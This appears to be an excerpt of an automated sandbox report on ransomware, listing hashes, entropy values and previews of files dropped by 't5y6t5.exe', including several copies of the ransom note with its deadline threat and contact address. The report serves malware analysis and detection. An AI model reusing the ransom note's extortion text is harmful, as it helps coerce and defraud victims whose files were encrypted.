                                                                                            Encrypted:false
                                                                                            SSDEEP:768:mFfFtPhB82SmyPA7YmM8ziRg3cziI68f+NoXzFS5pfo:mFfFJ7xEsiX68f+NoXzFS52
                                                                                            MD5:25FBE19558B7701F663D1659F04814A2
                                                                                            SHA1:3289687A94043145973196CD0ACC2D3333C8FEC4
                                                                                            SHA-256:82C4709FE53098091D04148CD60560ABE2E4B6964D5602C750B7F81844D5D1D7
                                                                                            SHA-512:883C65CC747A33779D07E084AC993656CEF933DB74255DC814D26661DA3E5989E507D0A1773AEACB624BC24723278936BEAA111AD6DE1F78874DD25BE5FAB883
                                                                                            Malicious:true
                                                                                            Preview:..`.....#c../.^"!u...K.....g>...6.r.Z^2B?.*x...Y.Vq..Rh.3.tS..[.+3\..%\.........>.".<.jF25..!.r..v.yUW..-.E.e=....!.G1.\..sSB.~..S.b..df.Q\.N~.....T.@=9.%h.....v.&V.&.k.KW.........bK....C.tA`....'..-t .h....hk.H..JO`]...6!g.R....{q....EINU.'..!%.....|.|)...1$;.8</.;....C...-p...[......4..!...w.p....l0'5..g..zG?..2n}..q..+.....}.p.].....c..F.....-.h..9.?o.z.[.O.+..9~`...v.(..,"..u..zV............y...N. ..........ZML5.#....K.-......;.L...........5.~o.4..>....[ce.K......*..5.#"..t..Z...D......9...E....}...a...q.'.!....O.... ...X/.9......s$....Y...j.b....[a.]6o.}0.7ZD'.F..[.<..rj*.8.3./......L.!}..qOL.......IYd.:e....`.. ...8..AM.F...&..i..Z..)...@.|...{.p.kY.+...~.......`.2qNm.%>zr0..=0..A...)..Q7.k{.~..v.._c.2....q.}.,...:...K.?.....7.vI|p.O..L.....@..?.S\....y..>..S5..i...8.YD.}..<.B.yXL..I..........F......!.a...G.".;.......TU|x...[...c...1x..f...j...^.~.V.:...-......~05.D.k|..lv..Y....`MKX..V....~5...P.,8...Lk..;:l..i..:.wV.\N*
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6948
                                                                                            Entropy (8bit):7.458930558393246
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:t4CntiD3hnyUDWn3RBzb6CTi91c1bNUsWf4p0CJwIRHRrHRKgK8A6JYVhRsxdxpa:tNtijhnXW3D6CTi9Ab3jRJA6unSrDadv
                                                                                            MD5:7D024DE4CBC80802D8E486EBBAE1193D
                                                                                            SHA1:2422FBB87796A657DC7737BBA2DDCE3C3B250ECF
                                                                                            SHA-256:440CC7DFC2ACB990B953C0E3AC3E6F482E6211E020DF07864C6548D407E4D133
                                                                                            SHA-512:2B2791EED8A63190DDB0041DDCD440F63E045E4FA3FB51327FA9F66CF679FB9369796DBDA1FD5E3AEA7C3AB81B1B8AA5154CA8A805E732A44EA4F2619C92BE2B
                                                                                            Malicious:true
                                                                                            Preview:./Y..tR.]..dW.4zP.@w.N.D......(.%..FY..`.....||...C.j..D^ ..^.I........&.3..9../.%..7......^......!........bv..P..O..3.. E.....q.."'g..d.(..,c.E.....n.6.....W..PK.../hm.....,....$....k8X.i..;K..k..v...:.KJ=.~..=...Ks..=K..t]c.b..u#(.n..];.z.....@."U..S.:`..M.H..\%M... p...E..Y@[..$.~.G.......j.t...7...wx..iN.=Y<Qz..N..f....%\.0*.w...Y......xa.Kv..E/.n.....pB..n.h.I.....R]._8.b.n....nYS....$.k.%..V.1Z,...x$.j...A..b..:.....M..[..e...B..c..j.....5.e"..9.....F..}.e=.N......k/....^.....n2%..k...p.mm...3]....X.I....Ac........Fk.zy$..riS3Z...{P.?sygj`.A..)!.<.Q..9.5.[....2P.T..0Ut5.rT.[b...\]....H_u..x8.j...X.,1..x;)..u...H.<..t..Q.Y...J@(Q='.j}6z.d...+......k..j=.cY...X@ .,$K.a7.{..<^..8G..i..=.[5m.F.....L.\~.......C!..v<..Et..zK..I....Y...8..A....[n.G......(.O..48.....(....~Kfd....... ..(.:..f.F.1&Rl.....K.r{....1..0.h...\{g....dX.....r..%=N#B..B..O.F.t..fj.7...v.1D.U...;]J.nw........$8.....9..#.........u.......+....D.S....Gm.U....}../....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):37050
                                                                                            Entropy (8bit):5.9022029947305095
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:XAPKV23MHAH2+SbfIluoW4BvlUNoXzFS5jp:XASk8gWLAPxBvlUNoXzFS5l
                                                                                            MD5:E2C63EEDC9E44860D9CDF9417E417068
                                                                                            SHA1:9F7B2D1A457C333C5C5ECE5AB805B2F7D85DD466
                                                                                            SHA-256:02166223468A4356A31A28B080E4D152CEA7A7D062B6A0C4362C933F735C2848
                                                                                            SHA-512:69A936C7702EAB99B427E79219CEA3EA5D8013EC37BBDE9C785C426E6DF993A13FB2E9AEADAD262C9D68689EAB4D979727C5653FE4433199EAA34FA1A05ED51B
                                                                                            Malicious:true
                                                                                            Preview:>].....D..c..........^y`.}.&..e..1F.7h.V.Y..V4.b...!.,...n=.-..rAqT..N....."e.^..{.<l........t......}.*..(FH.*........h7(81...q....#....6(....j.N..u5(....aX.SV..m......sgskj....&.m.8.f.:&}..[...M.....f...Q[5[#../.]<xs...F9.i.z..13...N)O..H<...........;?..^..yz.,.4Sa.'.E-.m<...X..:..p...c.....2.x........2.%.....J.0 h...PZ.X..q[j ....f!f......../R/......9.z..L..pR.@G...L.3......p.qzA_L8.."....G9..M...[....#....E......l.5..].1...S!.{.A.r...3..G.4.)$..v...7..........].c...oglu....Q.h.....k..Xb..,.fDnm.v.Q.....H.a...-...G..h\.L...?..~Q..S.._T+tM...P(iL..X...P.o.9B#..@..PD.(..8[....'.^..rr.Wll....V.......#U:"..`4N.H.?s.l..$...*.1(..c^.....j<A. .Cg.....+R.Ub..L.._.:K.& :B..mW..C.*0Z'.[2........9'#W(...o.....a.b.r3n[=.......Oy/..R.C...{.qX.....p.[.w.i..P.h_.)6.........j...t...5j.4..@or....W.Y..z.M....dX0..7S}..+...p..q.L..z..zOM.AT../%....y....1........{0...rNR..YH....G=.).../{...*.z9.@.*.p............C.._#..9. ...q.!..tk.h...L...*4~..R.a..i6.#W.&.g.2,
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):758
                                                                                            Entropy (8bit):7.7508797977508435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:QBcR4Miaw72RY16I+TgvkXa94xtG9AJg/L2+Vx6q8rLBn:xij78Mt+UvkXJxEiJg/6ix6q8rl
                                                                                            MD5:C6C50CC9EE4AD6263E19CADDA6952BB3
                                                                                            SHA1:EC1352935A0657380B34AB5C824048C7A3D926D6
                                                                                            SHA-256:C4A21CA144999E57A89EC59EB92FBDC4CE8382E8A091BA918AAB0E1086A7B81B
                                                                                            SHA-512:8B4802A96BD8F6604439DE3EA4180753FABF732C839626EBA09223CD56E8334B031D48DB388F83BAC9634FF80426CBB0B01867FE7E42AABC10F7DC6987D0C671
                                                                                            Malicious:true
                                                                                            Preview:......<9|..7.">......%,U)O.3..6./..X.9...rE..ni../B..-7...1.j.X....X..<.z.....#..L..........4.Pj{.H..K-...F..,c...%DR..|'.w.....n.Xcz..X.S...}..1H..."..F..".h%.v...f...S`.3.*..(!j0.L.69F.....cM.H...-......O.P./.."2.y~..}..@.........T...q.J..mR......r.l..UpfR..2..'E..+r..-.vi5....iyHm...)..y;2.c.......[. ..D..T9....z..ub...L...z.T...G.o.....iR......)....6....K.....&..$86.....,...Jm>`%..N%...~u.B.\.N+=...e..nI!.W>....[.hH..d1.g....Z...-?d.....`_........".2.1fbfafe8fb"}e.T..U!8f......k..E..K..P....o3kc...F:uH...l.l8.E.....t...EsW...r..E......P......@T@G...J.?.......s...9...1...+e8+..@.<...^^4<.Y.:ho.......D....aT.>..G)..K...gV..X.. .E..&yG$)+H.]..SA.]...B ......<...nQ2....<-....!4........P.9.pf.....>j.y3G@....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):615
                                                                                            Entropy (8bit):7.671604260181986
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ihHIvnZWmYGajFEx9sLqME+yMz3ffqLZeQk6u7KbAKn:ihWWmYnj+LsLq3+ymPfq1Q6cK
                                                                                            MD5:F33BEEAFE90655856CB4BFB7EA1C7F19
                                                                                            SHA1:BB3C10301AB0DDBDF2071353BB799CC726320E41
                                                                                            SHA-256:6503001C27DA59A1D1E36E674B19F17C543E786683566704628D7C3E8DFDC165
                                                                                            SHA-512:B7821BE6A5C6CF4370FA710E1A45F9B5C6DE1C34BC83A096B9962289E5AFA0EC9EBF149A0C8CC7888124C2735921379EE55C84AACC46A506C0FC4D7708B802ED
                                                                                            Malicious:true
                                                                                            Preview:>.giB`...o.,..M.S......0HB..._....ce.%j...\......t...|z...gB..6....I..>.mK...>..zo....>D.L.6.....V....s...T,.~...!.|.`.t.7eN.2..PP.rp..j.QI[d..C<...(.....i}.....'0..'......E..<...GQ..XR#../...cF..t.....%.p`..qb..q.'.a..t..t.q.#.`...._...n.../.....U.vI.b..v.....<...'....Hj........W=a.)./B."g+IN+L..".Y..Al..C..d..3..O#.0...Iz..Plt"}}}.g.[.....n.b..M...].*?a.zw...._\.C.E..H...g..>....."..m.,V..6X.4JS.....L....O.....n...2.6..uH.2=.-.......oH...........B-?Qz..M6m._4. vs......+.lD...d[k. ...rUA......&..&.3...Re..`.7.n....z.*{.lM.......2<i....7'......n5 D.;#..g>...md..].zh....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):554
                                                                                            Entropy (8bit):7.625873318124503
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:+ZBjWi7zGAXDO8V+3PzUjP0Qp022emGnWAGyIEjV8hIdFiHeiEz3J0BG5vCm0xgQ:+ZvffIPzg08fyyDGhrcz39vCh0b9iLn
                                                                                            MD5:6062BB63670A8624EBCA29AC26880CE1
                                                                                            SHA1:CA708AC6DC147863D39707806F1C063DCC3CA6A4
                                                                                            SHA-256:0E28724F57BC94909E45110F444BFD1AD4E9ADE3AE37358262AB55B97B93C129
                                                                                            SHA-512:2A1FB81F992092B4509B24DADD67F0B596F244CCF71CD6A38531E5B0CFA32578BFC7D64C45C9353393D4814EE6266D27381D5BD94B857745EF1C87F035748662
                                                                                            Malicious:true
                                                                                            Preview:#V....^D...f...i.875.......V.N...lXO....uj.q.~_......p$...........8..h._.n.I....E..."U"7...V..'y<..WI....o5.9Y......!....[Ki..l.e.]..v.?..|......D...e.7....9>.X....;5......GE%M.=q..-...z....../..'n...*BCZ.0..l.;Y.*.).....@/n..U.g..^.'.-.RgE...&X.T. .b......-complete":true}`P......lg=~.*<...%..z#..p....;z/_p...Yk-...$.DU..P....:. z..7..BX..1..I...$~{.0.U..h.;.o.W.......Wb..vW..P..s...V.4...>.._P.....h....<.Wz..J...p.a.*..<.6.\9.U...jg...g.0.].#.j..R.?..>.6XZ......k......Sv..O....."LW.IK.Z)..`N......]..H..4...;.K..#.y0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1570
                                                                                            Entropy (8bit):7.8645857817374205
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:h0JZq8CSqT52s8ovC1JvRIo9665bcV1s4b1dl0NOdGM8lkGx3ys4i4dFLw:+JZq8Cd2s8oo+bXCgEMIhd4pLw
                                                                                            MD5:EDEC057A808C5A500A12EC3170CECF53
                                                                                            SHA1:3F6D744E5906B2FEB8654EED25BFC2DFBBF60318
                                                                                            SHA-256:63F1A571CC3D8E66D3BB64B6CB9310C924D88EDA2F9C4291AD925457066C571B
                                                                                            SHA-512:F08B5FEA94C0020F51E68ED6C0ED0CE402055412E773E0E811F61E7CE8BF1A1DD3186E96CC8811E66691993A85BB2A5B16481A17FBC3EF1A168D7CCC6779D66A
                                                                                            Malicious:true
                                                                                            Preview:..e0~.oo .@...".R.Ki"..!.]%..'.U..f.O..g._../....&......-L.'v.Ea#v]...Y.......m.....r..7.s.....g~|+....j........C..R6.Z..Ns.w.l...x.......[sH......h.9....5..R.....\z..2N...|.\.koG..(....Y..~.L*.#..S.gt.Y....HQ.N....s....G. c.%w.K.......R.$.R.i.7..qe.....~.V..S.`..n.+K..r"R.....0h]...5.<;.....6.W.^..&...........>'.ii>.e.....4..hf;s..R./.\.W.....n'.F.GV.#L.Z..f.....&.-..].aD....{.....f..:.....9Q(9e..~.6.um?<...F..p.{.m.e}..?U..W@jI...^'j@J>.B.5..s.L..z?.Q.On..lK...L.........!.t.s.....P]...A=ez.U...6HP..D....Z0....}.kR.F...(E...+.m...5/...=..KvI..%.Rz....{.......r........i.......H..&.+..n....V.u..$...O^{OnK...].A .g.....o....*.f!'(w..P.T.'.j.7.5.....0.9p>.H......*..*....u...P..ke.+..Gv!f.....X...I5j.,.0..0.D...2.A.5...cJ...[..v.B\..P}..........\.i}.>...7....L$....R....Ox.+J.......?...J.......r.)...Y=..s........{^.%q...vu=..p>....q.5a.....3s$&.I9+7..|.=[.\=i...J...8......5Gu<.`...p..j..Q-..B..Y.{.......7.E.Qr...x.M$.}.....6..8c.})f34D#..]..@
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1570
                                                                                            Entropy (8bit):7.887928970169808
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:u4EWrTTFi5WD69AKPQcQGpPBqEi2PZjyTZ:u4EWfTsBANGpPlZjyZ
                                                                                            MD5:2218315F99176BDB7139C284D1B117E4
                                                                                            SHA1:4ECE09B0AD4E7E0A0D4429B5FE6A566B98C451D6
                                                                                            SHA-256:FBC4AEF7B597BCC7A41657301F1C875304095FCB92498D682351FDDB6D7FBAB9
                                                                                            SHA-512:C88A7D47BAFB38B76DEF4CE49C3A548144F40AC3574D68DB5208EFB03FAA3728AF7829E7FE74E55D2B5FF02343A68F082CBE4551625C128EECDC99CB485567F9
                                                                                            Malicious:false
                                                                                            Preview:!.."...}..tpk...n..DW|_.LiFc.o..T..`_-..c.@.........Z3Tg.f....%.U.H0TY..;.....8.\Dh?..`wh.3...+.rj.O..%/k.fO..(5....b..C...../.U...^[1..P.../..1.'.G.....d.<.W..AS...\.)fU...Y.J.N..9.e.(.H.F.T.....d.!.G..KnU.1..h.J.f.R+...V.u..IF.?.tD.....%B..\W..>5.....o.9.(KG.=.3.6..{..(.{.b......L.....v....U.y......U.[....{ 4..x....0.........?.....,..iw*....F.R..B..2...6.moX$.m.e,d.?....R`.9L...~#..H./L.-.^..f....."4.t.A.KT...B.^..........-.....U...hH.........b..6.....u..u$..F<..|..x..g.C"...z.b.^.qV.r..H.5...n.d.x(-.'Mw...z..(.0....LH...5. ..`t.....9.8.=.......9;..9FB....]T,}....V|.......Oey......7j)....,f.....H..[.<...9..^..X..F.m.3...J.....|p\...ZX."..z%.......v..........u..=QT.Eb.....Ol..9.k/..._.J...!l.wH.o..*R.L.......fsQ.ULC)W...5s.m..x|aJ.mI(=%.Q..Up.Nd.)....?@!..6..@A.......M..R.i).......Pe@{....j#=...Dm...D..8.{s...5....T....."]..v1...".&. ..|....P.NE5....'...e\p..K...U.&.i>jl...;...2.....n[.<.n`F..i....O.~.4..|.}P]y|.1C..6.+sr.. ...!f..r.H....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1483
                                                                                            Entropy (8bit):7.880136904050243
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:aRHh9XIHK/UVjbk01AfCS06GbrSv0saQ+Cf9r2Uxo9IE7kG4IfQgnhSdhQjER:alh9XCRVX/GfJ0/a2Cf9r2Uxo9XkGnfa
                                                                                            MD5:F88A90EE371E903E58EEDADF4B32F6C0
                                                                                            SHA1:0B7AA04086F7699D2A347A813859FF94E92EBFEF
                                                                                            SHA-256:A4BD8C73F0491726E8EDF06B7F6E65EEC81E588A77EB76EF1B8D7E687F46D844
                                                                                            SHA-512:C9F074440D21EAA9EAF389813FEBF55A5882145ED1D63D55BC8657ACCE8BB480B6A0FEA978863FDD4B214725311CE7ED8FE899840497BDC39A91002FF8B8385F
                                                                                            Malicious:true
                                                                                            Preview:.....W.@.....A.4.>D.{.}..@c.W..C./......".\lo.=eV.m.-..j.I.3...5..t.p...LgU$./...".BP.[.x..ln..\l..be%..nb.T..Hx.......?).Wl.$..Fn....u.YS..L..j.O7...x......`0Js....[....|.O=x...+.y...=O[C....Z...2uo......K..t.5.).3...C...w.2........x.7WK....\.}s.L...B#..M.......3..a..H.X..wY....*.{*ny..O.?.k.....F..G......,..W.^=.....b.....T7.6.[).fX<..{........2...l..#....mu]..;z.7...cKt..f..L....J=J.....60......>.O3.a.;;$...`.;....tg....g.[r.)..........3.B7CB7...{E-.[>.. #....u.".V../........w.T..:.....jP.$.....JOB..+,...P.w.j.$...7...D.."......Z......M..X.R.[.S:g?4k..*..S....B.n......8.>].<x.3.).y>.....!...M......nGq......U.2.7.iHs..&...." .>..iv..Qo.h.......r....-6..M....~.o+.J......./~...g.SQjW.W6#."..t...i..Ld.[.`...........X.rz.G.Q......u..wF.yT..i..SV.-.ju.+.!.......h...L..Izf.a..6.3.....b........,...xqQ..WJ.A.. ...~..U..V.[/..m..S.....g.,9}a.<..a.vs...T..Cx..k..4_c.....,(...#......q..<..K{..........>....<0..a..i!o3..<..j.b[m).a...).(.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):7.17980952084318
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Pb6AwFQlFCrNZcaGXIW4vct52fqOf0wni5GNzS4oJmHn:DkFlAYrE2tLi5G84oKn
                                                                                            MD5:A34E85C137107CEEE614659993468A94
                                                                                            SHA1:832AB4085511691D3EA4B80A81DAA475401FC51B
                                                                                            SHA-256:2FB045D780BC7562681A73707026B983BFDAB6D38A0276BB4E1E92928A535F14
                                                                                            SHA-512:8C8DB23AD77D53FB27DA5129536DD32BE6D1D2E4898D571969BBFCE4A41EB88E52A10C6A2458A01EEB02D2B6201604B6E334E8E05F86DCEADFD108A45EAEEB71
                                                                                            Malicious:false
                                                                                            Preview:E........%..L.}}X.E$@....../..D.rE.....B.<..U.af..w.....3....,..DZ.#}....V......T..@d...wu..%...w.u.....T*FHV.k..c.&!C.?^...Or+2./g..X......n\.G2C..D?....4.!.-Y.Sz...t{..e..2..._...y.*"z.H..s.tT..#h/..X....N.dRNx.........T.....V.X..l.....e....^B.e....X..&..I..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4362
                                                                                            Entropy (8bit):7.962061466487668
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:WPefx6x9iOGinjF7Esga1C+VZw8A0unRoN7:DZ6bnlx91C6yJLRoh
                                                                                            MD5:04AD7CCFBB67EB3C030D6B14FCC07EF4
                                                                                            SHA1:F4488CFDE5532963785B716E26421D3AC9DD39EA
                                                                                            SHA-256:03E9B2BBF93046E569C8187E574E7EB3FFCD176075EE0F82161E9CD1AD4E69E2
                                                                                            SHA-512:4AFF666DD49E12D44E32CFFCD9CDE29CA07DF5A9D5D456A2C74453EBFB07B1694CBBAD268DE0E556D446DEC4551AA8AE7158BFE62057A5EE8237152ECAE003A2
                                                                                            Malicious:true
                                                                                            Preview:_X.&.."..C...1^+6XZ.+....V.....Lm...f....$.25.... ..9...,..>..F..!.6.`.Y.VR..c..T;.....X!..a}<.....9..../.{..zb".$^BH....s......o....,..V.e?....R....%..(......B":..38......8......ry..U..a..`Zn..3....MahE.=....F....Up.h..Z}.].M..1^.x..,-On'..;...3i.4...gB.].......Nm.Y.&.......+d/.....V;..K..J.$.&S.x.2.^.*...f-..Z.QR|2[.....|7.>*K.|RA.zu.:....0...W........2g.....F..x.p..d."..g./..K.G...C4......|^k....[C0.l...7SM..u.....R..X..../.@..P.}i..........'.....!..J...[F.n...\|L....r.7....M!/.9!t..1@o-64.jER...M}.L#.!....P...B.\.Hv.+.8..D}.qs...L/.)..i..i..5...J@...:......5).0{x....0......x......X}.....<e...nK.p. .5....n..bx#..*@]Q.l.gI.~j..>.....j.......L.j.*....>......<}O-B.q.........'.....!$.]S...7u..#.w........+.ZG.|*..rW........L.........T7..jD..3...je<<tZ..."(.....`I.Xb..1./..!.'......Y....gm.V.3...*!.si.m.R.9..y.u>Z...Y.P.x. ...Y..a..If...W.._.E............^.>q8...&R...(..;A...O..U.U..1...z.....}v'.Z....7\].0.....+..+v.....D......a
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131338
                                                                                            Entropy (8bit):0.5084118939904857
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:yI9NI5Z/UqGHdrsc9d+1aBAJ3HesgytkcGrCx7IK5s6bJJfC6QQyoV8snkH:yyNI5NyHFB9cgqe1c82MKSWq6XypH
                                                                                            MD5:F118DFEFAA18B0070B695177FD675D36
                                                                                            SHA1:3CC5882C85ACE0B991100555D2C91FBE093A7878
                                                                                            SHA-256:C50E289FFA8A143AE48509FCFF1FBE8C58BBB3B2D9B31DDCB2A2E4471049B489
                                                                                            SHA-512:9B61465E22569B2CD5907ED2C0192C68C429B3B4A26D0A543C30862467BE985586BA1291D0E49FBAAAEBA3543BBF0CA603784B68C699081DC62CE975F518718B
                                                                                            Malicious:true
